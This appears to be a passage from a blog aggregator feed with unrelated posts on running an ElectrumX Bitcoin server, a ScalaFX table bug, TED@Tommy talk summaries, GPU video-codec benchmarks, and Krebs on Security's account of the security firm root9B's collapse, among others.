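Run against the post's own configuration the only finding is the placeholder rpcpassword, which is exactly the value to replace before exposing the server.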

Now you have a few days to wait until bitcoind fetches the whole blockchain and ElectrumX indexes it. If you happen to have another Bitcoin node running (or one that was running in the past), you can speed up the process by copying blocks from that system (located in ~/.bitcoin/blocks/). Only take blocks from sources you trust absolutely, as they might change your view of history; see the Bitcoin wiki for more information on the topic. There is also a magnet link in the ElectrumX docs to download the ElectrumX database to speed up this process. This should be safe to download from an untrusted source.

The last thing I'd like to mention is resource usage. You should have at least 4 GB of memory to run this, 8 GB is really preferred (both services together consume around 4 GB). On disk space, Bitcoin currently consumes 170 GB and ElectrumX 25 GB. Ideally all this should be running on an SSD.

You can however offload some of the files to slower storage, as old blocks are rarely accessed, and this can save some space on your fast storage. The following script will move around 50 GB of blockchain data to /mnt/btc/blocks (use it only when the Bitcoin daemon is not running):

#!/bin/sh
set -e

DEST=/mnt/btc/blocks

# The destination must exist; run this only while bitcoind is stopped
mkdir -p "$DEST"
cd ~/.bitcoin/blocks/

# The first 400 block (blk) and undo (rev) files are the oldest and rarely read:
# move them to the slower storage and leave symlinks behind
find . -type f \( -name 'blk00[0123]*.dat' -o -name 'rev00[0123]*.dat' \) | sed 's@^\./@@' | while read -r name ; do
        mv "$name" "$DEST/$name"
        ln -s "$DEST/$name" "$name"
done

Anyway if you would like to use this server, configure btc.cihar.com in your Electrum client.

If you find this howto useful, you can send some Satoshis to 3KPccmPtejpMczeog7dcFdqX4oTebYZ3tF.

Filed under: Crypto Debian English

Planet DebianNorbert Preining: ScalaFX: Problems with Tables abound

Doing a lot with all kinds of tables in ScalaFX, I stumbled upon a bug in ScalaFX that, with the help of the bug report, I was able to circumvent. It is a subtle bug where types are mixed between scalafx.SOMETHING and the corresponding javafx.SOMETHING.

In one of the answers it is stated that:

The issue is with implicit conversion from TableColumn not being located by Scala. I am not clear why this is happening (maybe a Scala bug).

But the provided work-around at least made it work. Until today, when I stumbled onto (probably) just another instance of this bug, but one where the same work-around does not help. I am using TreeTableViews and try to replace the children of the root by filtering out one element. The code I use is of course very different, but here is a reduced and fully contained example, based on the original bug report and adapted to use a TreeTableView:

import scalafx.Includes._
import scalafx.scene.control.TreeTableColumn._
import scalafx.scene.control.TreeItem._
import scalafx.application.JFXApp.PrimaryStage
import scalafx.application.JFXApp
import scalafx.scene.Scene
import scalafx.scene.layout._
import scalafx.scene.control._
import scalafx.scene.control.TreeTableView
import scalafx.scene.control.Button
import scalafx.scene.paint.Color
import scalafx.beans.property.{ObjectProperty, StringProperty}
import scalafx.collections.ObservableBuffer


// TableTester.scala
object TableTester extends JFXApp {

  val characters = ObservableBuffer[Person](
    new Person("Peggy", "Sue", "123", Color.Violet),
    new Person("Rocky", "Raccoon", "456", Color.GreenYellow),
    new Person("Bungalow ", "Bill", "789", Color.DarkSalmon)
  )

  val table = new TreeTableView[Person](
    new TreeItem[Person](new Person("","","",Color.Red)) {
      expanded = true
      children = characters.map(new TreeItem[Person](_))
    }) {
    columns ++= List(
      new TreeTableColumn[Person, String] {
        text = "First Name"
        cellValueFactory = {
          _.value.value.value.firstName
        }
        prefWidth = 180
      },
      new TreeTableColumn[Person, String]() {
        text = "Last Name"
        cellValueFactory = {
          _.value.value.value.lastName
        }
        prefWidth = 180
      }
    )
  }

  stage = new PrimaryStage {
    title = "Simple Table View"
    scene = new Scene {
      content = new VBox() {
        children = List(
          new Button("Test it") {
            onAction = p => {
              val foo: ObservableBuffer[TreeItem[Person]] = table.root.value.children.map(p => {
                val bar: TreeItem[Person] = p
                p
              })
              table.root.value.children = foo
            }
          },
          table)
      }
    }
  }
}

// Person.scala
class Person(firstName_ : String, lastName_ : String, phone_ : String, favoriteColor_ : Color = Color.Blue) {

  val firstName = new StringProperty(this, "firstName", firstName_)
  val lastName = new StringProperty(this, "lastName", lastName_)
  val phone = new StringProperty(this, "phone", phone_)
  val favoriteColor = new ObjectProperty(this, "favoriteColor", favoriteColor_)

  firstName.onChange((x, _, _) => System.out.println(x.value))
}

With this code what one gets on compilation with the latest Scala and ScalaFX is:

[error]  found   : scalafx.collections.ObservableBuffer[javafx.scene.control.TreeItem[Person]]
[error]  required: scalafx.collections.ObservableBuffer[scalafx.scene.control.TreeItem[Person]]
[error]               val foo: ObservableBuffer[TreeItem[Person]] = table.root.value.children.map(p => {
[error]                                                                                          ^
[error] one error found

And in this case, adding import statements didn’t help, what a pity. Unfortunately this bug is open since 2014 with a helpwanted tag and nothing is going on. I guess I have to try to dive into the source code of ScalaFX 🙁

Planet DebianRenata Scheibler: Hello, world!


Planet DebianMichal Čihař: New projects on Hosted Weblate

Hosted Weblate also provides free hosting for free software projects. The hosting requests queue has grown too long, so it's time to process it and include new projects.

This time, the newly hosted projects include:

If you want to support this effort, please donate to Weblate; recurring donations are especially welcome to keep this service alive. You can do that easily on Liberapay or Bountysource.

Filed under: Debian English SUSE Weblate

TED“The courage to …” The talks of TED@Tommy

At TED@Tommy — held November 14, 2017, at Mediahaven in Amsterdam — fifteen creators, leaders and innovators invited us to dream, to dare and to do. (Photo: Richard Hadley / TED)

Courage comes in many forms. In the face of fear, it’s the conviction to dream, dare, innovate, create and transform. It’s the ability to try and try again, to admit when we’re wrong and stand up for what’s right.

TED and Tommy Hilfiger both believe in the power of courageous ideas to break conventions and celebrate individuality — it’s the driving force behind why the two organizations have partnered to bring experts in fashion, sustainability, design and more to the stage to share their ideas.

More than 300 Tommy associates from around the world submitted their ideas to take part in TED@Tommy, with more than 20 internal events taking place at local and regional levels, and the top 15 ideas were selected for the red circle on the TED@Tommy stage. At this inaugural event — held on November 14, 2017, at Mediahaven in Amsterdam — creators, leaders and innovators invited us to dream, to dare and to do.

After opening remarks from Daniel Grieder, CEO, Tommy Hilfiger Global and PVH Europe, and Avery Baker, Chief Brand Officer, Tommy Hilfiger Global, the talks of Session 1 kicked off.

Fashion is “about self-expression, a physical embodiment of what we portray ourselves as,” says Mahir Can Isik, speaking at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

Let fashion express your individuality. The stylish clothes you’re wearing right now were predicted to be popular up to two years before you ever bought them. This is thanks to trend forecasting agencies, which sell predictions of the “next big thing” to designers.  And according to Tommy Hilfiger retail buyer Mahir Can Isik, trend forecasting is, for lack of a better term, “absolutely bull.” Here’s a fun fact: More than 12,000 fashion brands all get their predictions from the same single agency — and this, Isik suggests, is the beginning of the end of true individuality. “Fashion is an art form — it’s about excitement, human interaction, touching our hearts and desires,” he says. “It’s about self-expression, a physical embodiment of what we portray ourselves as.” He calls on us to break this hold of forecasters and cherish self-expression and individuality.

Stylish clothing for the differently abled fashionista. Mindy Scheier believes that what you wear matters. “The clothes you choose can affect your mood, your health and your confidence,” she says. But when Scheier’s son Oliver was born with muscular dystrophy, a degenerative disorder that makes it hard for him to dress himself or wear clothing with buttons or zippers, she and her husband resorted to dressing him in what was easiest: sweatpants and a T-shirt. One afternoon when Oliver was eight, he came home from school and declared that he wanted to wear blue jeans like everyone else. Determined to help her son, Mindy spent the entire night MacGyvering a pair of jeans, opening up the legs to give them enough room to accommodate his braces and replacing the zipper and button with a rubber band. Oliver went to school beaming in his jeans the next day — and with that first foray into adaptive clothing, Scheier founded Runway of Dreams to educate the fashion industry about the needs of differently abled people. She explains how she designs for people who have a hard time getting dressed, and how she partnered with Tommy Hilfiger to make fashion history by producing the first mainstream adaptive clothing line, Tommy Adaptive.

Environmentally friendly, evolving fashion. The clothing industry is the world’s second largest source of pollution, second only to the oil and gas industry. (The equivalent of 200 T-shirts per person are thrown away annually in the US alone). Which is why sustainability sower Amit Kalra thinks a lot about how to be conscientious about the environment and still stay stylish. For his own wardrobe, he hits the thrift stores and stitches up his own clothing from recycled garments; as he says, “real style lives at the intersection of design and individuality.” As consumer goods companies struggle to provide consumers with the individuality they crave, Kalra suggests one way forward: Start using natural dyes (from sources such as turmeric or lichen) to color clothes sustainably. As the color fades, the clothing grows more personalized and individual to the owner. “There is no fix-all,” Kalra says, “But the fashion industry is the perfect industry to experiment and embrace change that could one day get us to the sustainable future we so desperately need.”

Tito Deler performs Big Joe Turner’s blues classic “Story to Tell” at TED@Tommy. (Photo: Richard Hadley / TED)

With a welcome musical interlude, blues musician (and VP of graphic design for Tommy Hilfiger) Tito Deler takes the stage, singing and strumming a stirring rendition of Big Joe Turner’s blues classic “Story to Tell.”

The truth we can find through literary fiction. Day by day, we’re exposed to streams of news, updates and information. Our brains are busier than ever as we try to understand the world we live in and develop our own story, and we often reach for nonfiction books to learn to become a better leader or inventor, how to increase our focus, and how to maintain a four-hour workweek. But for Tomas Elemans, brand protection manager for PVH, there’s an important reward from reading fiction that we’re leaving behind: empathy. “Empathy is the friendly enemy to our feeling of self-importance. Storytelling can help us to not only understand but feel the complexity, emotions and situations of distant others. It can be a vital antidote to the stress of all the noise around us,” Elemans says. Telling his personal story of the ups and downs of reading Dave Eggers’ Heroes of the Frontier, Elemans explains the importance of narrative immersion — how we transcend the here-and-now when we imagine being the characters in the stories we read — and how it reduces externally focused attention and increases reflection. “Literature has a way of reminding us that the stranger is not so strange,” Elemans says. “The ambition with which we turn to nonfiction books, we can also foster toward literature … Fiction can help us to disconnect from ourselves and tap into an emotional, empathetic side that we don’t often take the time to explore.”

Irene Mora shares the valuable lessons she learned being raised by a mom who was also a CEO. (Photo: Richard Hadley / TED)

Why you shouldn’t fear having a family and a career. As the child of parents who followed their passions and led successful careers, Irene Mora appreciates rather than resents their decision to have a family. Society’s perceptions of what it means to be a good parent — which usually means rejecting the dedicated pursuit of a profession — are dull and outdated, says Mora, now a merchandiser for Calvin Klein. “A lot of these conversations focus on the hypothetical negative effects, rather than the hypothetical positive effects that this could have on children,” Mora explains. “I’m living proof of the positive.” As she and her sister traveled the world with their parents due to her mother’s job as a CEO, she learned valuable lessons: adaptability, authenticity and independence. And despite her mother’s absences and limited face-to-face time, Mora didn’t feel abandoned or lacking in any way. “If your children know that you care, they will feel your love,” she says. “You don’t always have to be together to love and be loved.”

What you can learn from bad advice. Nicole Wilson, Tommy Hilfiger’s director of corporate responsibility, knows bad advice. From a young age, her father — a professional football player notorious for causing kitchen fires — would offer her unhelpful tidbits like: “It’s better to cheat than repeat,” or, at a street intersection, “No cop-y, no stop-y.” As a child, Wilson learned to steer clear of her father’s, ahem, wisdom, but as an adult, she realized that there’s an upside to bad advice. In this fun, personal talk, she shares how bad advice can be as helpful and as valuable as “so-called good advice” — because it can help you recognize extreme courses of action and develop a sense of when you should take the opposite advice from what you’re being offered. Above all, Wilson says, bad advice teaches you that “you have to learn to trust yourself — to take your own advice — because more times than not, your own advice is the best advice you are ever going to get.”

Fashion is a needed avenue of protest, says Kaustav Dey. He spoke about how we can embrace our most authentic selves at TED@Tommy. (Photo: Richard Hadley / TED)

Fashion as a language of dissent. From a young age, fashion revolutionary and head of marketing for Tommy Hilfiger India Kaustav Dey knew that he was different, that his sense of self diverged from and even contradicted that of the majority of his classmates. He was never going to be the manly man his father hoped for and whom society privileged, he says. But it was precisely this distinct take on himself that would later land him in the streets of Milan and Paris, fashion worlds that further opened his eyes to the protest value of aesthetics. Dey explains the idea that fashion is a needed avenue of protest (but also a dangerous route to take) by speaking of the hateful comments Malala received for wearing jeans, by commenting on the repressive nature of widowed Indian women being eternally bound to white garments, and by telling the stories of the death of transgender activist Alesha and the murder of the eclectic actor Karar Nushi. Instead of focusing on society’s response to these individuals, Dey emphasizes that “fashion can give us a language of dissent.” Dey encourages us all to embrace our most authentic selves, so “in a world that’s becoming whitewashed, we will become the pinpricks of color pushing through.”

Returning to the stage to open Session 2, Tito Deler plays an original blues song, “My Fine Reward,” combining the influence of the sound of his New York upbringing with the style of pre-war Mississippi Delta blues. “I’m moving on to a place now where the streets are paved with gold,” Deler sings, “I’m gonna catch that fast express train to my reward in the sky.”

We should all make it a point not to buy fake goods and to notify officials when we see them being sold, says Alastair Gray, speaking at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

The deadly impact of counterfeit goods. To most consumers, the trade in knock-off goods seems harmless enough — we get to save money by buying lookalike products, and if anyone suffers, it’s only the big companies. But counterfeit investigator Alastair Gray says that those fake handbags, CDs and watches might be supporting organized crime or even terrorist organizations. “You wouldn’t buy a live scorpion because there’s a chance it will sting you on the way home,” Gray says. “But would you still buy a fake handbag if you knew the profit would enable someone to buy the bullets that might kill you and other innocent people?” This isn’t just conjecture: Saïd and Chérif Kouachi, the two brothers behind the 2015 attack on the Charlie Hebdo office in Paris that killed 12 people and wounded 11, purchased their weapons using the proceeds made from selling counterfeit sneakers. When it comes to organized crime and terrorism, most of us feel understandably helpless. But we do have the power to act, Gray says: make it a point not to buy fake goods and to notify officials (online or in real life) when we see them being sold.

Is data a designer’s hero? Data advocate Steve Brown began working in the fashion industry 15 years ago — when he would have to painstakingly sit for 12 hours each day picking every color that matched every fabric per garment he was working on. Today, however, designers can work with visualized 3D garments, fully functional with fabric, trim and prints, and they can even upload fabric choices to view the flow and drape of the design, all before a garment is ever made. Data and technology saves the designer time, Brown says, which allows for more time and attention to go into the creative tasks rather than the mundane ones. The designer’s role with data and technology is that of both a creator and a curator. He points to Amazon’s “Body Labs” and algorithms that learn a user’s personal style, both of which help companies to design custom-made garments. In this way, data can empower both the consumer and designer — and it should be embraced.

A better way to approach data. Every day, we’re inundated with far more data than our brains can process. Data translator Jonathan Koch outlines a few simple tools we can all use to understand and even critique data meant to persuade us. First: we need transparent definitions. Koch, a senior director of strategy and business development at PVH Asia Pacific, uses the example of a famous cereal brand that promised two scoops of raisins in every box of cereal (without bothering to define exactly what a “scoop” is) and a company that says that they’re the “fastest growing startup in Silicon Valley” (without providing a time period for context). The next tool: context and doubt. To get a clearer picture, we need to always question the context around data, and we need to always doubt the source, Koch says. Finally, we need to solve the problem of averages. When we deconstruct averages, which is how most data is delivered to us, into small segments, we can better understand what makes up the larger whole — and quickly get new, nuanced insights. With these three simple tools, we can use data to help us make better decisions about our health, wealth and happiness.

Conscious quitter Daniela Zamudio explains the benefits of moving on at TED@Tommy in Amsterdam. (Photo: Richard Hadley / TED)

An introduction to conscious quitting. “I’m a quitter,” says Daniela Zamudio, “and I’m very good at it.” Like many millennials, Zamudio has quit multiple jobs, cities, schools and relationships, but she doesn’t think quitting marks her as weak or lazy or commitment-phobic. Instead, she argues that leaving one path to follow another is a sign of strength and often leads to greater happiness in the long run. Now a senior marketing and communications manager for Tommy Hilfiger, Zamudio gives us an introduction to what she calls “conscious quitting.” She teaches us to weigh the pros and cons of quitting a particular situation and then instructs us to create a strategy to deal with the repercussions of our choice. For instance, after Zamudio broke off her engagement to a man she had been dating for nine years, she managed her heartbreak by scheduling every minute of her day, seven days a week. “It takes courage to quit,” says Zamudio, “but too often it feels also like it’s wrong.” She concludes her talk by reminding us that listening to our own needs and feelings (and ignoring society’s expectations) can often be just what we need.

Lessons in dissent. Have you ever presented an idea and been immediately barraged with a line of questioning that feels like it’s poking more holes than it is actually questioning? Then you’ve probably engaged with a dissenter. Serial dissenter Andrew Millar promises these disagreements don’t come from a place of malice but rather from compassion with an aim to improve on your idea. “At this point in time, we don’t have enough dissenters in positions of power,” says Millar. “And history shows that having yes-men is rarely a driver of progress.” He suggests that dissenters find a workplace that truly works with them, not against — so if a company heralds conformity or relies heavily on hierarchy, then that place may not be the best for you. But even in the most welcome environment, no dissenter gets off scot-free — each needs to understand that compromise, or dissent upon response, and thinking you’re always right because you’re the only one to speak up are things that need to be mitigated to be successful. And to those in the path of a dissenter, says Millar, know this: when a dissenter speaks up, it can come across as criticism, but please do assume it stems from a place of good intent and connection.

Gabriela Roa speaks about learning to live in, and embrace, chaos, at TED@Tommy in Amsterdam. (Richard Hadley / TED)

Embrace the chaos. As the daughter of an obsessively organized mother, Gabriela Roa grew up believing that happiness was a color-coordinated closet. When she became a mom, she says, “I wanted my son to feel safe and loved in the way I did.” But he, like most toddlers, became “a chaos machine,” leaving toys and clothes in his wake. Roa, an IT project manager at PVH, felt terrible. Not only was she falling short as a disciplinarian, but she was so busy dwelling on her lapses that she wasn’t emotionally present for her son. One day, she remembered this piece of advice: “Whenever you experience a hard moment, there is always something to smile about.” In search of a smile, she began taking photos of her son’s messes. She shared them with friends and was moved by the compassion she received, so she started taking more pictures of her “happy explorer,” in which she documented her son’s creations and tried seeing life from his perspective. She realized that unlike her, he was living in the now — calm, curious and ready to investigate. The project changed her, ultimately bringing her back to playing the cello, an instrument she’d once loved. “I’m not saying that chaos is better than order,” says Roa. “But it is part of life.”

Present fathers: strong children. Dwight Stitt is a market manager for Tommy Hilfiger, but he identifies first and foremost as a father. He speaks passionately about the need for men to be involved in their children’s lives. Reminiscing about his own relationship with his father — and how it took 24 years for them to form a working bond — Stitt shares that so long as life permits, it’s never too late to recover what may seem lost. He has incorporated the lessons he learned from his father and amplified them to reach not only his children but also other people through a camp and canoeing trip. Conceiving of camp as an opportunity to foster love and growth between fathers and children, Stitt says that “camp has taught me that fatherhood is not only vital to a child’s development, but that seemingly huge hurdles can be overcome by simple acts of love and memorable moments.” He goes so far as to explain the emotional, academic and behavioral benefits of working father-child relationships and, in between tears, calls on all fathers to share his goal of reducing the alarming statistics of fatherlessness in whatever form it comes.

How magic tricks (and politicians) fool your brain. Ever wonder how a magic trick works? How did the magician pull a silver coin from behind your ear? How did they know which card was yours? According to magician and New York Times crossword puzzle constructor David Kwong, it all boils down to evolution. Because we take in an infinite number of stimuli at any given time, we only process a tiny fraction of what’s in front of us. Magic works, Kwong says, by exploiting the gaps in our awareness. We never notice the magician flipping our card to the top of the deck because we’re too busy watching him rub his sleeve three times. But the principles of illusion extend beyond a bit of sleight-of-hand, he says. Politicians also exploit us with cognitive misdirection. For instance, policymakers describe an inheritance tax (which only taxes the very wealthy) as a “death tax” to make the public think it applies to everyone. Kwong then demonstrates a few fun tricks to teach us how to see through the illusions and deceptions that surround us in everyday life. He finishes his set with some sage words of advice for everyone (magic lovers or not): “Question what seems obvious, and above all, pay attention to your attention.”

CryptogramMotherboard Digital Security Guide

This digital security guide by Motherboard is very good. I put it alongside EFF's "Surveillance Self-Defense" and John Scott-Railton's "Digital Security Low Hanging Fruit." There's also "Digital Security and Privacy for Human Rights Defenders."

There are too many of these....

Worse Than FailureCodeSOD: Delebation

When faced with an API or programming paradigm that requires repetitive, boilerplate code, a developer is left with two options. They may refine or adapt the API/paradigm, using the idioms of their language to make something tedious and verbose into something elegant and clear.

Or they just automate it. If you have a mile of boilerplate that’s mostly the same across the application, just generate that. It’s like copy/paste, but, y’know… automatic.

Which is why Derf Skren found this pile in their codebase:

  public abstract class ExchangeSingleData : IExchangeData
  {
    private readonly string mName;
    private readonly int mLength;

    private Dictionary<string, string> mMapValidData;
    private byte[] mBuffer;

    void AddValidValue(string name, string value) {
        mMapValidData[name] = value;
    }
    //...
    //...
  }

  public class NetChangeSign : ExchangeSingleData
  {
    public const string Plus = "+";
    public const string Minus = "-";

    public NetChangeSign()
      : base("NetChangeSign", 1)
    {
      AddValidValue("Plus", Plus);
      AddValidValue("Minus", Minus);
    }
  }

  public class BidPriceSign : ExchangeSingleData
  {
    public const string Plus = "+";
    public const string Minus = "-";

    public BidPriceSign()
      : base("BidPriceSign", 1)
    {
      AddValidValue("Plus", Plus);
      AddValidValue("Minus", Minus);
    }
  }

  public class AskPriceSign : ExchangeSingleData
  {
    public const string Plus = "+";
    public const string Minus = "-";

    public AskPriceSign()
      : base("AskPriceSign", 1)
    {
      AddValidValue("Plus", Plus);
      AddValidValue("Minus", Minus);
    }
  }

  // ... and 7 more versions of the same class

The goal of this code is so that they can prepend a “+” or a “-” to a transaction’s value. Note the mBuffer in the base class: they don’t use strings (or, y’know… numbers) to represent the transaction value, but a byte array instead. The “value” is that it lets them write a line like this:

  lMessage.NetChangeSign.SetValue(GeneratePriceSign(lPrice));

Which allows the instance stored in NetChangeSign to flip that +/- based on the return value of GeneratePriceSign. Obviously, this lets the NetChangeSign instance have full control of the logic of how the sign gets set, right? I mean, each instance has its own map that contains all the allowed values, right? Well… sure, but how do they decide? Based on GeneratePriceSign… which looks like this:

  private static string GeneratePriceSign(Side aSide)
  {
    if (aSide.Equals(Side.Buy))
      return "+";
    else
      return "-";
  }

In design patterns terms, we call this “delebation”. It’s like delegation, but only the person doing it to themselves enjoys it.


Planet DebianColin Watson: Kitten Block equivalent for Firefox 57

I’ve been using Kitten Block for years, since I don’t really need the blood pressure spike caused by accidentally following links to certain UK newspapers. Unfortunately it hasn’t been ported to Firefox 57. I tried emailing the author a couple of months ago, but my email bounced.

However, if your primary goal is just to block the websites in question rather than seeing kitten pictures as such (let’s face it, the internet is not short of alternative sources of kitten pictures), then it’s easy to do with uBlock Origin. After installing the extension if necessary, go to Tools → Add-ons → Extensions → uBlock Origin → Preferences → My filters, and add www.dailymail.co.uk and www.express.co.uk, each on its own line. (Of course you can easily add more if you like.) Voilà: instant tranquility.

Incidentally, this also works fine on Android. The fact that it was easy to install a good ad blocker without having to mess about with a rooted device or strange proxy settings was the main reason I switched to Firefox on my phone.


Planet DebianSteinar H. Gunderson: Introducing Narabu, part 6: Performance

Narabu is a new intraframe video codec. You probably want to read part 1, part 2, part 3, part 4 and part 5 first.

Like I wrote in part 5, there basically isn't a big splashy ending where everything is resolved here; you're basically getting some graphs with some open questions and some interesting observations.

First of all, though, I'll need to make a correction: In the last part, I wrote that encoding takes 1.2 ms for 720p luma-only on my GTX 950, which isn't correct—I remembered the wrong number. The right number is 2.3 ms, which I guess explains even more why I don't think it's acceptable at the current stage. (I'm also pretty sure it's possible to rearchitect the encoder so that it's much better, but I am moving on to other video-related things for the time being.)

I encoded a picture straight off my DSLR (luma-only) at various resolutions, keeping the aspect. Then I decoded it a bunch of times on my GTX 950 (low-end last-generation NVIDIA) and on my HD 4400 (ultraportable Haswell laptop) and measured the times. They're normalized for megapixels per second decoded; remember that doubling width (x axis) means quadruple the pixels. Here it is:

Narabu decoding performance graph

I'm not going to comment much beyond two observations:

  • Caches matter, even on GPU. This is the same data over and over again (so small images get an unrealistic boost), so up to a certain point, it's basically all in L1.
  • The GTX 950 doesn't really run away from the Intel card before it's getting enough data to chew on. Bigger GPUs don't have faster cores—they're just more parallel.

Encoding only contains the GTX 950 because I didn't finish the work to get that single int64 divide off:

Narabu encoding performance graph

This is… interesting. I have few explanations. Probably more benchmarking and profiling would be needed to make sense of any of it. In fact, it's so strange that I would suspect a bug, but it does indeed seem to create a valid bitstream that is decoded by the decoder.

Do note, however, that seemingly even on the smallest resolutions, there's a 1.7 ms base cost (you can't see it on the picture, but you'd see it in an unnormalized graph). I don't have a very good explanation for this either (even though there are some costs that are dependent on the alphabet size instead of the number of pixels), but figuring it out would probably be a great start for getting the performance up.

So that concludes the series, on a cliffhanger. :-) Even though it's not in a situation where you can just take it and put it into something useful, I hope it was an interesting introduction to the GPU! And in the meantime, I've released version 1.6.3 of Nageru, my live video mixer (also heavily GPU-based) with various small adjustments and bug fixes found before and during Trøndisk. And Movit is getting compute shaders for that extra speed boost, although parts of it is bending my head. Exciting times in GPU land :-)

Planet DebianDaniel Pocock: Linking hackerspaces with OpenDHT and Ring

Francois and Nemen at the FIXME hackerspace (Lausanne) weekly meeting are experimenting with the Ring peer-to-peer softphone:

Francois is using Raspberry Pi and PiCam to develop a telepresence network for hackerspaces (the big screens in the middle of the photo).

The original version of the telepresence solution is using WebRTC. Ring's OpenDHT potentially offers more privacy and resilience.

TEDOpen now: Audition for TED2018!

Olalekan Jeyifous speaks at TED Talent Search 2017 - Ideas Search, January 26, 2017, New York, NY. Photo: Anyssa Samari / TED

At last year’s TEDNYC Idea Search, artist Olalekan Jeyifous showed off his hyper-detailed and gloriously complex imaginary cities. See more of his work in this TED Gallery. Photo: Anyssa Samari / TED

Do you have an idea worth spreading? Do you want to speak on the TED2018 stage in Vancouver in April?

To find more new voices, TED is hosting an Idea Search at our office theater in New York City on January 24, 2018. Speakers who audition at this event might be chosen for the TED2018 stage or to become part of our digital archive on TED.com.

You’re invited to pitch your amazing idea to try out on the Idea Search stage in January. The theme of TED2018 is The Age of Amazement, so we are looking for ideas that connect to that theme — from all angles. Are you working on cutting-edge technology that the world needs to hear about? Are you making waves with your art or research? Are you a scientist with a new discovery or an inventor with a new vision? A performer with something spectacular to share? An incredible storyteller? Please apply to audition at our Idea Search.

Important dates:

The deadline to apply to the Idea Search is Tuesday, December 5, 2017, at noon Eastern.

The Idea Search event happens in New York City from the morning of January 23 through the morning of January 25, 2018. Rehearsals will take place on January 23, and the event happens in the evening of January 24.

TED2018 happens April 10–14, 2018, in Vancouver.

Don’t live in the New York City area? Don’t let that stop you from applying — we may be able to help get you here.

Here’s how to apply!

Sit down and think about what kind of talk you’d like to give, then script a one-minute preview of the talk.

Film yourself delivering the one-minute preview (here are some insider tips for making a great audition video).

Upload the film to Vimeo or YouTube, titled: “[Your name] TED2018 audition video: [name of your talk]” — so, for example: “Jane Smith TED2018 audition video: Why you should pay attention to roadside wildflowers”

Then complete the entry form, paste your URL in, and hit Submit!

Curious to learn more?

Read about a few past Idea Search events: TEDNYC auditions in 2017, in 2014 and in 2013.

Watch talks from past Idea Search events that went viral on our digital archive on TED.com:

Christopher Emdin: Teach teachers how to create magic (more than 2 million views)
Sally Kohn: Let’s try emotional correctness (more than 2 million views)
Lux Narayan: What I learned from 2,000 obituaries (currently at 1.4 million views!)
Lara Setrakian: 3 ways to fix a broken news industry (just shy of a million views)
Todd Scott: An intergalactic guide to using a defibrillator (also juuust south of a million)

And here are just a few speakers who were discovered during past talent searches:

Ashton Applewhite: Let’s end ageism (1m views)
OluTimehin Adegbeye: Who belongs in a city? (a huge hit at TEDGlobal 2017)
Richard Turere: My invention that made peace with the lions (2m views)
Zak Ebrahim: I am the son of a terrorist. Here’s how I chose peace (4.7m views and a TED Book)


Krebs on SecurityR.I.P. root9B? We Hardly Knew Ya!

root9B Holdings, a company that many in the security industry consider little more than a big-name startup aimed at cashing in on the stock market’s insatiable appetite for cybersecurity firms, surprised no one this week when it announced it was ceasing operations at the end of the year.

Founded in 2011 as root9B Technologies, the company touted itself as an IT security training firm staffed by an impressive list of ex-military leaders with many years of cybersecurity experience at the Department of Defense and National Security Agency (NSA). As it began to attract more attention from investors, root9B’s focus shifted to helping organizations hunt for cyber intruders within their networks.

By 2015, root9B was announcing lucrative cybersecurity contracts with government agencies and the infusion of millions from investors. The company’s stock was ballooning in price, reaching an all-time high in mid-May 2015.

That was just days after root9B issued a headline-grabbing report about how its cyber intelligence had single-handedly derailed a planned Russian cyber attack on several U.S. financial institutions.

The report, released May 12, 2015, claimed root9B had uncovered plans by an infamous Russian hacking group to target several banks. The company said the thwarted operation was orchestrated by Fancy Bear/Sofacy, a so-called “advanced persistent threat” (APT) hacking group known for launching sophisticated phishing attacks aimed at infiltrating some of the world’s biggest corporations. root9B released its Q1 2015 earnings two days later, reporting record revenues.

On May 20, 2015, KrebsOnSecurity published a rather visceral dissection of that root9B report: Security Firm Redefines APT; African Phishing Threat. The story highlighted the thinness of the report’s claims, pointing to multiple contradictory findings by other security firms which suggested the company had merely detected several new phishing domains being erected by a comparatively low-skilled African phishing gang that was well-known to investigators and U.S. banks.

In mid-June 2015, an anonymous researcher who’d apparently done a rather detailed investigation into root9B’s finances said the company was “a worthless reverse-merger created by insiders with [a] long history of penny-stock wipeouts, fraud allegations, and disaster.”

That report, published by the crowd-sourced financial market research site SeekingAlpha.com, sought to debunk claims by root9B that it possessed “proprietary” cybersecurity hardware and software, noting that the company mainly acts as a reseller of a training module produced by a third party.

root9B’s stock price never recovered from those reports, and began a slow but steady decline after mid-2015. In Dec. 2016, root9B Technologies announced a reverse split of its issued and outstanding common stock, saying it would be moving to the NASDAQ market with the trading symbol RTNB and a new name — root9B Holdings. On January 18, 2017, a reshuffled root9B rang the market opening bell at NASDAQ, and got a bounce when it said it’d been awarded a five-year training contract to support the U.S. Defense Department.

The company’s founders remained upbeat even into mid-2017. On June 6, 2017 it announced that Michael Hayden, the four-star general who until recently served as director of the U.S. National Security Agency, had joined the company’s board.

On June 23, 2017, root9B issued a press release reminding everyone that the company had remained #1 on the Cybersecurity 500 for the 6th consecutive quarter. The Cybersecurity 500, by the way, rates cybersecurity firms based on their “branding and marketing.”

Nobody ever accused root9B of bad marketing. But all the press releases in the world couldn’t hide the fact that the company had never turned a profit. It lost more than $18.3 million in 2016, more than doubling an $8.03 million loss in 2015.

Since August 2017, shares of the company’s stock have fallen more than 90 percent. On Sept. 28, 2017, all of root9B Holdings’ assets were acquired by venture investment firm Tracker Capital Management LLC, and then sold at auction.

On Nov. 13, root9B Holdings issued a press release saying NASDAQ was de-listing the firm on Nov. 15 and that it was ceasing operations at the end of this year.

“With the absence of any operating assets remaining after the Foreclosure, the Company will cease any and all operations effective, December 31, 2017,” the (final?) root9B press release concludes.

Several followers on Twitter say it’s too soon to sound the death knell for root9B as a whole, pointing out that while root9B Holdings may have been gutted and sold, for now it appears the security company root9B LLC is intact and is merely going back to being a private concern.

In any case, the demise of root9B Holdings resonates loudly with that of Norse Corp., another flashy, imploded cybersecurity startup that banked heavily on attracting and touting top talent, while managing to produce very little that was useful to or actionable by anybody.

Companies like these are a reminder that your success or failure in business as in life is directly tied to what you produce — not what you promise or represent. There is no shortcut to knowledge, success or mastery, and this goes for infosec students as well as active practitioners of the craft. Focus on consistently producing quality, unique content and/or services that are of real value to others, and the rest will take care of itself.

Update, 10:30 a.m.: Added perspective from Twitter readers.

Sociological ImagesWhat’s Trending? A Rise in STDs

The CDC recently issued a press release announcing that rates of reported cases for sexually transmitted diseases are setting record highs. The new report tabulates rates going back to 1941, so I made a quick chart to see the pattern in context and compare the more common conditions over time (HIV wasn’t included in this particular report).

